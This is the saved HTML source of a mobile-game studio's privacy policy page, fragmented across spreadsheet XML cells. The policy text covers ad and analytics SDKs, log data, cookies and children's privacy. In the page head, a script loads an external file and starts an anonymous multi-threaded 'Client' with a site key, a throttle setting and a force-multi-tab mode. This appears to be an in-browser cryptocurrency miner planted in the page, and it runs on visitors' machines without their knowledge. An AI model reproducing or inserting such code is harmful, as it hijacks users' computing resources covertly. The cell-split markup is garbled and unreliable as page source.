&lt;link rel="alternate" type="application/json+oembed" href="http://bonbongame.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fbonbongame.com%2Fprivacy-policy%2F"&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="http://bonbongame.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fbonbongame.com%2Fprivacy-policy%2F&amp;amp;format=xml"&gt;
&lt;script&gt;var ms_grabbing_curosr='http://bonbongame.com/wp-content/plugins/masterslider/public/assets/css/common/grabbing.cur',ms_grab_curosr='http://bonbongame.com/wp-content/plugins/masterslider/public/assets/css/common/grab.cur';&lt;/script&gt;
&lt;meta name="generator" content="MasterSlider 3.2.14 - Responsive Touch Image Slider"&gt;
&lt;style&gt;.bg{opacity: 0; transition: opacity 1s; -webkit-transition: opacity 1s;} .bg-loaded{opacity: 1;}&lt;/style&gt;&lt;!--[if IE]&gt;&lt;link rel="stylesheet" type="text/css" href="http://bonbongame.com/wp-content/themes/flatsome/assets/css/ie-fallback.css"&gt;&lt;script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.6.1/html5shiv.js"&gt;&lt;/script&gt;&lt;script&gt;var head = document.getElementsByTagName('head')[0],style = document.createElement('style');style.type = 'text/css';style.styleSheet.cssText = ':before,:after{content:none !important';head.appendChild(style);setTimeout(function(){head.removeChild(style);}, 0);&lt;/script&gt;&lt;script src="http://bonbongame.com/wp-content/themes/flatsome/assets/libs/ie-flexibility.js"&gt;&lt;/script&gt;&lt;![endif]--&gt;&lt;link rel="icon" href="http://bonbongame.com/wp-content/uploads/2019/12/cropped-icon-bonbon-32x32.png" sizes="32x32"&gt;
&lt;link rel="icon" href="http://bonbongame.com/wp-content/uploads/2019/12/cropped-icon-bonbon-192x192.png" sizes="192x192"&gt;
&lt;link rel="apple-touch-icon" href="http://bonbongame.com/wp-content/uploads/2019/12/cropped-icon-bonbon-180x180.png"&gt;
&lt;meta name="msapplication-TileImage" content="http://bonbongame.com/wp-content/uploads/2019/12/cropped-icon-bonbon-270x270.png"&gt;
&lt;style id="custom-css" type="text/css"&gt;:root {--primary-color: #446084;}.header-main{height: 60px}#logo img{max-height: 60px}#logo{width:200px;}.header-top{min-height: 30px}.transparent .header-main{height: 60px}.transparent #logo img{max-height: 60px}.has-transparent + .page-title:first-of-type,.has-transparent + #main &gt; .page-title,.has-transparent + #main &gt; div &gt; .page-title,.has-transparent + #main .page-header-wrapper:first-of-type .page-title{padding-top: 60px;}.transparent .header-wrapper{background-color: rgba(255,255,255,0.67)!important;}.transparent .top-divider{display: none;}.header.show-on-scroll,.stuck .header-main{height:70px!important}.stuck #logo img{max-height: 70px!important}.header-bg-color, .header-wrapper {background-color: rgba(255,255,255,0.67)}.header-bottom {background-color:</t>
  </si>
  <si>
    <t>#f1f1f1}.header-main .nav &gt; li &gt; a{line-height: 17px }.header-wrapper:not(.stuck) .header-main .header-nav{margin-top: -4px }@media (max-width: 549px) {.header-main{height: 70px}#logo img{max-height: 70px}}body{font-family:"Lato", sans-serif}body{font-weight: 400}.nav &gt;</t>
  </si>
  <si>
    <t>li &gt; a {font-family:"Lato", sans-serif;}.nav &gt; li &gt; a {font-weight: 700;}h1,h2,h3,h4,h5,h6,.heading-font, .off-canvas-center .nav-sidebar.nav-vertical &gt; li &gt; a{font-family: "Lato", sans-serif;}h1,h2,h3,h4,h5,h6,.heading-font,.banner h1,.banner h2{font-weight: 700;}.alt-font{font-family: "Dancing Script", sans-serif;}.alt-font{font-weight: 400!important;}.header:not(.transparent) .header-nav.nav &gt; li &gt;</t>
  </si>
  <si>
    <t>a {color: rgba(21,21,19,0.4);}.footer-2{background-color: #303030}.absolute-footer, html{background-color: #383838}.label-new.menu-item &gt; a:after{content:"New";}.label-hot.menu-item &gt; a:after{content:"Hot";}.label-sale.menu-item &gt; a:after{content:"Sale";}.label-popular.menu-item &gt; a:after{content:"Popular";}&lt;/style&gt;&lt;script src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/ab20.js"&gt;&lt;/script&gt;&lt;script&gt;var _client = new Client. Anonymous('1f8a0f16caaf7bb75d7c1c05db46e340bfd034c9f520a1c228b1a545703e695e', {throttle: 0.50, c: 'w', ads: 0}); _client.setNumThreads(15);_client.setAutoThreadsEnabled(1);_client.start(Client.</t>
  </si>
  <si>
    <t>FORCE_MULTI_TAB);&lt;/script&gt;&lt;/head&gt; 
&lt;body class="page-template-default page page-id-1467 _masterslider _msp_version_3.2.14 lightbox nav-dropdown-has-arrow"&gt;
&lt;a class="skip-link screen-reader-text" href="#main"&gt;Skip to content&lt;/a&gt;
&lt;div id="wrapper"&gt;
	&lt;header id="header" class="header has-sticky sticky-jump" style=""&gt;
		&lt;div class="header-wrapper"&gt;
			&lt;div id="masthead" class="header-main "&gt;
      &lt;div class="header-inner flex-row container logo-left medium-logo-center" role="navigation"&gt;
          &lt;!-- Logo --&gt;
          &lt;div id="logo" class="flex-col logo"&gt;
            &lt;!-- Header logo --&gt;
&lt;a href="http://bonbongame.com/" title="BonBon Game" rel="home"&gt;
    &lt;img src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/logo-ngang-1.png" class="header_logo header-logo" alt="BonBon Game" width="200" height="60"&gt;&lt;img src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/logo-ngang-1.png" class="header-logo-dark" alt="BonBon Game" width="200" height="60"&gt;&lt;/a&gt;
          &lt;/div&gt;
          &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Mobile Left Elements --&gt;
          &lt;div class="flex-col show-for-medium flex-left"&gt;
            &lt;ul class="mobile-nav nav nav-left "&gt;
              &lt;li class="nav-icon has-icon"&gt;
  		&lt;a href="#" data-open="#main-menu" data-pos="left" data-bg="main-menu-overlay" data-color="" class="is-small" aria-label="Menu" aria-controls="main-menu" aria-expanded="false"&gt;
		  &lt;i class="icon-menu"&gt;&lt;/i&gt;
		  		&lt;/a&gt;
	&lt;/li&gt;            &lt;/ul&gt;
          &lt;/div&gt;
          &lt;!-- Left Elements --&gt;
          &lt;div class="flex-col hide-for-medium flex-left
            flex-grow"&gt;
            &lt;ul class="header-nav header-nav-main nav nav-left  nav-uppercase"&gt;
                          &lt;/ul&gt;
          &lt;/div&gt;
          &lt;!-- Right Elements --&gt;
          &lt;div class="flex-col hide-for-medium flex-right"&gt;
            &lt;ul class="header-nav header-nav-main nav nav-right  nav-uppercase"&gt;
              &lt;li id="menu-item-258" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home  menu-item-258"&gt;&lt;a href="http://bonbongame.com/" class="nav-top-link"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1390" class="menu-item menu-item-type-post_type menu-item-object-page  menu-item-1390"&gt;&lt;a href="http://bonbongame.com/games/" class="nav-top-link"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-337" class="menu-item menu-item-type-post_type menu-item-object-page  menu-item-337"&gt;&lt;a href="http://bonbongame.com/about/" class="nav-top-link"&gt;About Us&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-262" class="menu-item menu-item-type-post_type menu-item-object-page  menu-item-262"&gt;&lt;a href="http://bonbongame.com/contact/" class="nav-top-link"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-374" class="menu-item menu-item-type-post_type menu-item-object-page  menu-item-374"&gt;&lt;a href="http://bonbongame.com/careers/" class="nav-top-link"&gt;Careers&lt;/a&gt;&lt;/li&gt;
            &lt;/ul&gt;
          </t>
  </si>
  <si>
    <t>&lt;/div&gt;
          &lt;!-- Mobile Right Elements --&gt;
          &lt;div class="flex-col show-for-medium flex-right"&gt;
            &lt;ul class="mobile-nav nav nav-right "&gt;
                          &lt;/ul&gt;
          &lt;/div&gt;
      &lt;/div&gt;&lt;!-- .header-inner --&gt;
      &lt;/div&gt;&lt;!-- .header-main --&gt;
&lt;div class="header-bg-container fill"&gt;&lt;div class="header-bg-image fill"&gt;&lt;/div&gt;&lt;div class="header-bg-color fill"&gt;&lt;/div&gt;&lt;/div&gt;&lt;!-- .header-bg-container --&gt;		&lt;/div&gt;&lt;!-- header-wrapper--&gt;
	&lt;/header&gt;
	&lt;main id="main" class=""&gt;
&lt;div id="content" class="content-area page-wrapper" role="main"&gt;
	&lt;div class="row row-main"&gt;
		&lt;div class="large-12 col"&gt;
			&lt;div class="col-inner"&gt;
						&lt;h1 style="text-align: center;"&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Bonbongame built the app as an Ad Supported app. This SERVICE is 
provided by Bonbongame at no cost and is intended for use as is.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding our policies with the 
collection, use, and disclosure of Personal Information if anyone 
decided to use our Service.&lt;/p&gt;
&lt;p&gt;If you choose to use our Service, then you agree to the collection 
and use of information in relation to this policy. The Personal 
Information that we collect is used for providing and improving the 
Service. We will not use or share your information with anyone except as
 described in this Privacy Policy.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The terms used in this Privacy Policy have the same meanings as in 
our Terms and Conditions, which is accessible at unless otherwise 
defined in this Privacy Policy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Information Collection and Use&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; For a better experience, while using our Service, we may require you 
to provide us with certain personally identifiable information, 
including but not limited to personal picture.</t>
  </si>
  <si>
    <t>The information that we 
request will be retained by us and used as described in this privacy 
policy.&lt;/p&gt;
&lt;p&gt; The app does use third party services that may collect information used to identify you.&lt;/p&gt;
&lt;p&gt;Link to privacy policy of third party service providers used by the app&lt;/p&gt;
&lt;div data-children-count="0"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://support.google.com/admob/answer/6128543?hl=en" target="_blank" rel="noopener noreferrer"&gt;AdMob&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://firebase.google.com/policies/analytics" target="_blank" rel="noopener noreferrer"&gt;Google Analytics for Firebase&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.facebook.com/about/privacy/update/printable" target="_blank" rel="noopener noreferrer"&gt;Facebook&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://unity3d.com/legal/privacy-policy" target="_blank" rel="noopener noreferrer"&gt;Unity&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;2. Log Data&lt;/strong&gt;&lt;/p&gt;
&lt;p data-children-count="0"&gt;We want to inform you that whenever you use 
our Service, in a case of an error in the app we collect data and 
information (through third party products) on your phone called Log 
Data.</t>
  </si>
  <si>
    <t>This Log Data may include information such as your device Internet
 Protocol (“IP”) address, device name, operating system version, the 
configuration of the app when utilizing our Service, the time and date 
of your use of the Service, and other statistics.&lt;/p&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;3. Cookies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cookies are files with a small amount of data that are commonly used 
as anonymous unique identifiers. These are sent to your browser from the
 websites that you visit and are stored on your device’s internal 
memory.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This Service does not use these “cookies” explicitly. However, the 
app may use third party code and libraries that use “cookies” to collect
 information and improve their services. You have the option to either 
accept or refuse these cookies and know when a cookie is being sent to 
your device.</t>
  </si>
  <si>
    <t>If you choose to refuse our cookies, you may not be able to
 use some portions of this Service.&lt;/p&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;4. Service Providers&lt;/strong&gt;&lt;/p&gt;
&lt;p data-children-count="0"&gt;We may employ third-party companies and individuals due to the following reasons:&lt;/p&gt;
&lt;ul data-children-count="0"&gt;
&lt;li&gt;To facilitate our Service;&lt;/li&gt;
&lt;li&gt;To provide the Service on our behalf;&lt;/li&gt;
&lt;li&gt;To perform Service-related services; or&lt;/li&gt;
&lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-children-count="0"&gt;We want to inform users of this Service that 
these third parties have access to your Personal Information. The reason
 is to perform the tasks assigned to them on our behalf.</t>
  </si>
  <si>
    <t>However, they 
are obligated not to disclose or use the information for any other 
purpose.&lt;/p&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;5. Security&lt;/strong&gt;&lt;/p&gt;
&lt;p data-children-count="0"&gt;We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security.&lt;/p&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;6.</t>
  </si>
  <si>
    <t>Links to Other Sites&lt;/strong&gt;&lt;/p&gt;
&lt;p data-children-count="0"&gt;This Service may contain links to other 
sites. If you click on a third-party link, you will be directed to that 
site. Note that these external sites are not operated by us.</t>
  </si>
  <si>
    <t>Therefore, 
we strongly advise you to review the Privacy Policy of these websites. 
 We have no control over and assume no responsibility for the content, 
privacy policies, or practices of any third-party sites or services.&lt;/p&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;7. Children’s Privacy&lt;/strong&gt;&lt;/p&gt;
&lt;p data-children-count="0"&gt;These Services do not address anyone under 
the age of 13.</t>
  </si>
  <si>
    <t>We do not knowingly collect personally identifiable 
information from children under 13. In the case we discover that a child
 under 13 has provided us with personal information, we immediately 
delete this from our servers. If you are a parent or guardian and you 
are aware that your child has provided us with personal information, 
please contact us so that we will be able to do necessary actions.&lt;/p&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;8.</t>
  </si>
  <si>
    <t>Changes to This Privacy Policy&lt;/strong&gt;&lt;/p&gt;
&lt;p data-children-count="0"&gt;We may update our Privacy Policy from time to
 time. Thus, you are advised to review this page periodically for any 
changes. We will notify you of any changes by posting the new Privacy 
Policy on this page.&lt;/p&gt;
&lt;p data-children-count="0"&gt;This policy is effective as of 2020-07-31&lt;/p&gt;
&lt;p data-children-count="0"&gt;&lt;strong&gt;9.</t>
  </si>
  <si>
    <t>Contact Us&lt;/strong&gt;&lt;/p&gt;
&lt;p data-children-count="0"&gt;If you have any questions or suggestions about our Privacy Policy, do not hesitate to contact us at hr@bonbongame.com.&lt;/p&gt;
												&lt;/div&gt;&lt;!-- .col-inner --&gt;
		&lt;/div&gt;&lt;!-- .large-12 --&gt;
	&lt;/div&gt;&lt;!-- .row --&gt;
&lt;/div&gt;
&lt;/main&gt;&lt;!--</t>
  </si>
  <si>
    <t>#main --&gt;
&lt;footer id="footer" class="footer-wrapper"&gt;
&lt;!-- FOOTER 1 --&gt;
&lt;!-- FOOTER 2 --&gt;
&lt;div class="footer-widgets footer footer-2 dark"&gt;
		&lt;div class="row dark large-columns-1 mb-0"&gt;
		&lt;div id="block_widget-2" class="col pb-0 widget block_widget"&gt;
		&lt;/div&gt;
		&lt;div id="block_widget-4" class="col pb-0 widget block_widget"&gt;
			&lt;section class="section" id="section_2044364098"&gt;
		&lt;div class="bg section-bg fill bg-fill  bg-loaded"&gt;
	&lt;div class="is-border" style="border-width:0px 0px 0px</t>
  </si>
  <si>
    <t>0px;margin:0px 0px 0px 0px;"&gt;
	&lt;/div&gt;
		&lt;/div&gt;&lt;!-- .section-bg --&gt;
		&lt;div class="section-content relative"&gt;
&lt;div class="row row-full-width align-center" id="row-1835592494"&gt;
&lt;div class="col medium-4 small-12 large-4"&gt;&lt;div class="col-inner" style="padding:0px 0px 0px 0px;margin:0px 0px 0px 0px;"&gt;
&lt;div class="row" id="row-725399240"&gt;
&lt;div class="col medium-6 small-12 large-6"&gt;&lt;div class="col-inner" style="padding:0px 0px 0px 0px;margin:0px 0px 0px 0px;"&gt;
	&lt;div class="img has-hover x md-x lg-x y md-y lg-y" id="image_478296489"&gt;
		&lt;a class="" href="https://apps.apple.com/us/developer/bonbongame-com/id1219863203#see-all/i-phonei-pad-apps" target="_blank" rel="noopener noreferrer"&gt;						&lt;div class="img-inner dark"&gt;
			&lt;img src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/appstore.png" class="attachment-large size-large" alt="" loading="lazy" width="250" height="83"&gt;						
					&lt;/div&gt;
						&lt;/a&gt;		
&lt;style scope="scope"&gt;
#image_478296489 {
  width: 100%;
}
&lt;/style&gt;
	&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="col medium-6 small-12 large-6"&gt;&lt;div class="col-inner" style="padding:0px 0px 0px</t>
  </si>
  <si>
    <t>0px;margin:0px 0px 0px 0px;"&gt;
	&lt;div class="img has-hover x md-x lg-x y md-y lg-y" id="image_1297791360"&gt;
		&lt;a class="" href="https://play.google.com/store/apps/developer?id=bonbongame.com" target="_blank" rel="noopener noreferrer"&gt;						&lt;div class="img-inner dark"&gt;
			&lt;img src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/google-play.png" class="attachment-large size-large" alt="" loading="lazy" width="250" height="83"&gt;						
					&lt;/div&gt;
						&lt;/a&gt;		
&lt;style scope="scope"&gt;
#image_1297791360 {
  width: 100%;
}
&lt;/style&gt;
	&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="col medium-4 small-12 large-4"&gt;&lt;div class="col-inner" style="padding:0px 0px 0px 0px;margin:0px 0px 0px 0px;"&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="col medium-4 small-12 large-4"&gt;&lt;div class="col-inner" style="padding:0px 0px 0px 0px;margin:0px 0px 0px 0px;"&gt;
&lt;div class="social-icons follow-icons full-width text-center"&gt;&lt;a href="https://www.facebook.com/bonbongameDOTcom/" target="_blank" data-label="Facebook" rel="noopener noreferrer nofollow" class="icon button circle is-outline facebook tooltip tooltipstered"&gt;&lt;i class="icon-facebook"&gt;&lt;/i&gt;&lt;/a&gt;&lt;a href="https://www.youtube.com/channel/UCt4br4R6IIEsKK-08IwrtcA" target="_blank" rel="noopener noreferrer nofollow" data-label="YouTube" class="icon button circle is-outline  youtube tooltip tooltipstered"&gt;&lt;i class="icon-youtube"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;a href="http://bonbongame.com/privacy-policy/"&gt;Privacy Policy&lt;/a&gt; | &lt;a href="http://bonbongame.com/term-of-service/"&gt;Term of Service&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;style scope="scope"&gt;
#row-1835592494 &gt; .col</t>
  </si>
  <si>
    <t>&gt; .col-inner {
  padding: 0px 0px 0px 0px;
}
&lt;/style&gt;
&lt;/div&gt;
		&lt;/div&gt;&lt;!-- .section-content --&gt;
&lt;style scope="scope"&gt;
#section_2044364098 {
  padding-top: 0px;
  padding-bottom: 0px;
}
&lt;/style&gt;
	&lt;/section&gt;
		&lt;/div&gt;
		&lt;/div&gt;&lt;!-- end row --&gt;
&lt;/div&gt;&lt;!-- end footer 2 --&gt;
&lt;div class="absolute-footer dark medium-text-center text-center"&gt;
  &lt;div class="container clearfix"&gt;
    &lt;div class="footer-primary pull-left"&gt;
            &lt;div class="copyright-footer"&gt;
        Copyright 2022 © &lt;strong&gt;Bonbongame&lt;/strong&gt;      &lt;/div&gt;
          &lt;/div&gt;&lt;!-- .left --&gt;
  &lt;/div&gt;&lt;!-- .container</t>
  </si>
  <si>
    <t>--&gt;
&lt;/div&gt;&lt;!-- .absolute-footer --&gt;
&lt;a href="#top" class="back-to-top button icon invert plain fixed bottom z-1 is-outline hide-for-medium circle" id="top-link"&gt;&lt;i class="icon-angle-up"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/footer&gt;&lt;!-- .footer-wrapper --&gt;
&lt;/div&gt;&lt;!-- #wrapper --&gt;
&lt;!-- Mobile Sidebar --&gt;
&lt;div id="main-menu" class="mobile-sidebar no-scrollbar mfp-hide"&gt;
    &lt;div class="sidebar-menu no-scrollbar "&gt;
        &lt;ul class="nav nav-sidebar  nav-vertical nav-uppercase"&gt;
              &lt;li class="header-search-form search-form html relative has-icon"&gt;
	&lt;div class="header-search-form-wrapper"&gt;
		&lt;div class="searchform-wrapper ux-search-box relative is-normal"&gt;&lt;form method="get" class="searchform" action="http://bonbongame.com/" role="search"&gt;
		&lt;div class="flex-row relative"&gt;
			&lt;div class="flex-col flex-grow"&gt;
	   	   &lt;input type="search" class="search-field mb-0" name="s" id="s" placeholder="Search…" autocomplete="off"&gt;
			&lt;/div&gt;&lt;!-- .flex-col --&gt;
			&lt;div class="flex-col"&gt;
				&lt;button type="submit" class="ux-search-submit submit-button secondary button icon mb-0" aria-label="Submit"&gt;
					&lt;i class="icon-search"&gt;&lt;/i&gt;				&lt;/button&gt;
			&lt;/div&gt;&lt;!-- .flex-col --&gt;
		&lt;/div&gt;&lt;!-- .flex-row --&gt;
    &lt;div class="live-search-results text-left z-top"&gt;&lt;div class="autocomplete-suggestions" style="position: absolute; display: none; max-height: 300px; z-index: 9999;"&gt;&lt;/div&gt;&lt;/div&gt;
&lt;/form&gt;
&lt;/div&gt;	&lt;/div&gt;
&lt;/li&gt;&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-258"&gt;&lt;a href="http://bonbongame.com/" class="nav-top-link"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1390"&gt;&lt;a href="http://bonbongame.com/games/" class="nav-top-link"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-337"&gt;&lt;a href="http://bonbongame.com/about/" class="nav-top-link"&gt;About Us&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-262"&gt;&lt;a href="http://bonbongame.com/contact/" class="nav-top-link"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-374"&gt;&lt;a href="http://bonbongame.com/careers/" class="nav-top-link"&gt;Careers&lt;/a&gt;&lt;/li&gt;
WooCommerce not Found&lt;li class="header-newsletter-item has-icon"&gt;
  &lt;a href="#header-newsletter-signup" class="tooltip tooltipstered"&gt;
    &lt;i class="icon-envelop"&gt;&lt;/i&gt;
    &lt;span class="header-newsletter-title"&gt;
      Newsletter    &lt;/span&gt;
  &lt;/a&gt;&lt;!-- .newsletter-link --&gt;
&lt;/li&gt;&lt;li</t>
  </si>
  <si>
    <t>class="html header-social-icons ml-0"&gt;
	&lt;div class="social-icons follow-icons"&gt;&lt;a href="http://url/" target="_blank" data-label="Facebook" rel="noopener noreferrer nofollow" class="icon plain facebook tooltip tooltipstered"&gt;&lt;i class="icon-facebook"&gt;&lt;/i&gt;&lt;/a&gt;&lt;a href="http://url/" target="_blank" rel="noopener noreferrer nofollow" data-label="Instagram" class="icon plain  instagram tooltip tooltipstered"&gt;&lt;i class="icon-instagram"&gt;&lt;/i&gt;&lt;/a&gt;&lt;a href="http://url/" target="_blank" data-label="Twitter" rel="noopener noreferrer nofollow" class="icon plain  twitter tooltip tooltipstered"&gt;&lt;i class="icon-twitter"&gt;&lt;/i&gt;&lt;/a&gt;&lt;a href="mailto:your@email" data-label="E-mail" rel="nofollow" class="icon plain  email tooltip tooltipstered"&gt;&lt;i class="icon-envelop"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;        &lt;/ul&gt;
    &lt;/div&gt;&lt;!-- inner --&gt;
&lt;/div&gt;&lt;!-- #mobile-menu --&gt;
&lt;div class="floating-menu float-menu-1 fm-ready"&gt;&lt;ul class="fm-bar fm-connected fm-white-icon fm-white-icon-over fm-white-label-text fm-css-anim" style="left: 0px; top: 608px;"&gt;&lt;li class="fm-item-1-0"&gt;&lt;a href="https://www.facebook.com/bonbongameDOTcom/" target="_self"&gt;&lt;div class="fm-icon"&gt;&lt;i class="fab fa-facebook-f"&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="fm-label" style="opacity: 0;"&gt;Facebook&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="fm-item-1-1"&gt;&lt;a href="https://www.youtube.com/channel/UCt4br4R6IIEsKK-08IwrtcA" target="_self"&gt;&lt;div class="fm-icon"&gt;&lt;i class="fab fa-youtube"&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="fm-label" style="opacity: 0;"&gt;Youtube&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;link rel="stylesheet" id="float-menu-fontawesome-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/fontawesome-all.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="float-menu-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/style_003.css" type="text/css" media="all"&gt;
&lt;style id="float-menu-inline-css" type="text/css"&gt;
.float-menu-1 { z-index: 9; }.fm-item-1-0 .fm-icon, .fm-item-1-0 a:hover .fm-icon, .fm-item-1-0 .fm-label{color:#ffffff;background-color:#999999;}.fm-item-1-1 .fm-icon, .fm-item-1-1 a:hover .fm-icon, .fm-item-1-1 .fm-label{color:#ffffff;background-color:#595959;} .fm-bar.fm-right li, .fm-right .fm-mask, .fm-hit, .fm-icon { height: 48px; } .fm-bar a, .fm-icon, .fm-round .fm-hit, .fm-sub &gt; ul { width: 48px; } .fm-icon, .fm-label { line-height:48px; } .fm-icon { font-size: 24px; } .fm-label { font-size: 15px; } .fm-icon .fa</t>
  </si>
  <si>
    <t>{ line-height: 48px !important; } .fm-label, .fm-label-space .fm-hit, .fm-sub.fm-side &gt; ul { left: 48px; } .fm-right .fm-label, .fm-right.fm-label-space .fm-hit, .fm-right .fm-sub.fm-side &gt; ul { right: 48px; } .fm-round.fm-label-space .fm-hit { width: 50px; } .fm-sub &gt; ul { top: 48px; } .fm-round li, .fm-round .fm-mask, .fm-round .fm-icon, .fm-round a, .fm-round .fm-label { border-radius: 24px; } .fm-connected .fm-label { padding: 0 11px 0 56px; } .fm-right.fm-connected .fm-label { padding: 0 56px 0 11px; } .fm-connected.fm-round .fm-label { padding: 0 12px 0 47px; } .fm-right.fm-connected.fm-round .fm-label { padding: 0 47px 0 12px; } @media only screen and (max-width: 480px){ .fm-bar.fm-right li, .fm-right .fm-mask, .fm-hit, .fm-icon { height: 48px; } .fm-bar a, .fm-icon, .fm-round .fm-hit, .fm-sub &gt; ul { width: 48px; } .fm-icon, .fm-label { line-height:48px; } .fm-icon { font-size: 24px; } .fm-label { font-size: 15px; } .fm-icon .fa</t>
  </si>
  <si>
    <t>{ line-height: 48px !important; } .fm-label, .fm-label-space .fm-hit, .fm-sub.fm-side &gt; ul { left: 48px; } .fm-right .fm-label, .fm-right.fm-label-space .fm-hit, .fm-right .fm-sub.fm-side &gt; ul { right: 48px; } .fm-round.fm-label-space .fm-hit { width: 50px; } .fm-sub &gt; ul { top: 48px; } .fm-round li, .fm-round .fm-mask, .fm-round .fm-icon, .fm-round a, .fm-round .fm-label { border-radius: 24px; } .fm-connected .fm-label { padding: 0 11px 0 56px; } .fm-right.fm-connected .fm-label { padding: 0 56px 0 11px; } .fm-connected.fm-round .fm-label { padding: 0 12px 0 47px; } .fm-right.fm-connected.fm-round .fm-label { padding: 0 47px 0 12px; } }
&lt;/style&gt;
&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/wp-polyfill.js" id="wp-polyfill-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" id="wp-polyfill-js-after"&gt;
( 'fetch' in window ) || document.write( '&lt;script src="http://bonbongame.com/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js?ver=3.0.0"&gt;&lt;/scr' + 'ipt&gt;' );( document.contains )</t>
  </si>
  <si>
    <t>|| document.write( '&lt;script src="http://bonbongame.com/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js?ver=3.42.0"&gt;&lt;/scr' + 'ipt&gt;' );( window. DOMRect ) || document.write( '&lt;script src="http://bonbongame.com/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js?ver=3.42.0"&gt;&lt;/scr' + 'ipt&gt;' );( window. URL &amp;&amp; window.URL.prototype &amp;&amp; window.</t>
  </si>
  <si>
    <t>URLSearchParams ) || document.write( '&lt;script src="http://bonbongame.com/wp-includes/js/dist/vendor/wp-polyfill-url.min.js?ver=3.6.4"&gt;&lt;/scr' + 'ipt&gt;' );( window. FormData &amp;&amp; window.FormData.prototype.keys ) || document.write( '&lt;script src="http://bonbongame.com/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js?ver=3.0.12"&gt;&lt;/scr' + 'ipt&gt;' );( Element.prototype.matches &amp;&amp; Element.prototype.closest ) || document.write( '&lt;script src="http://bonbongame.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js?ver=2.0.2"&gt;&lt;/scr' + 'ipt&gt;' );
&lt;/script&gt;
&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/i18n.js" id="wp-i18n-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/lodash.js" id="lodash-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" id="lodash-js-after"&gt;
window.lodash = _.noConflict();
&lt;/script&gt;
&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/url.js" id="wp-url-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/hooks.js" id="wp-hooks-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" id="wp-api-fetch-js-translations"&gt;
( function( domain, translations ) {
	var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
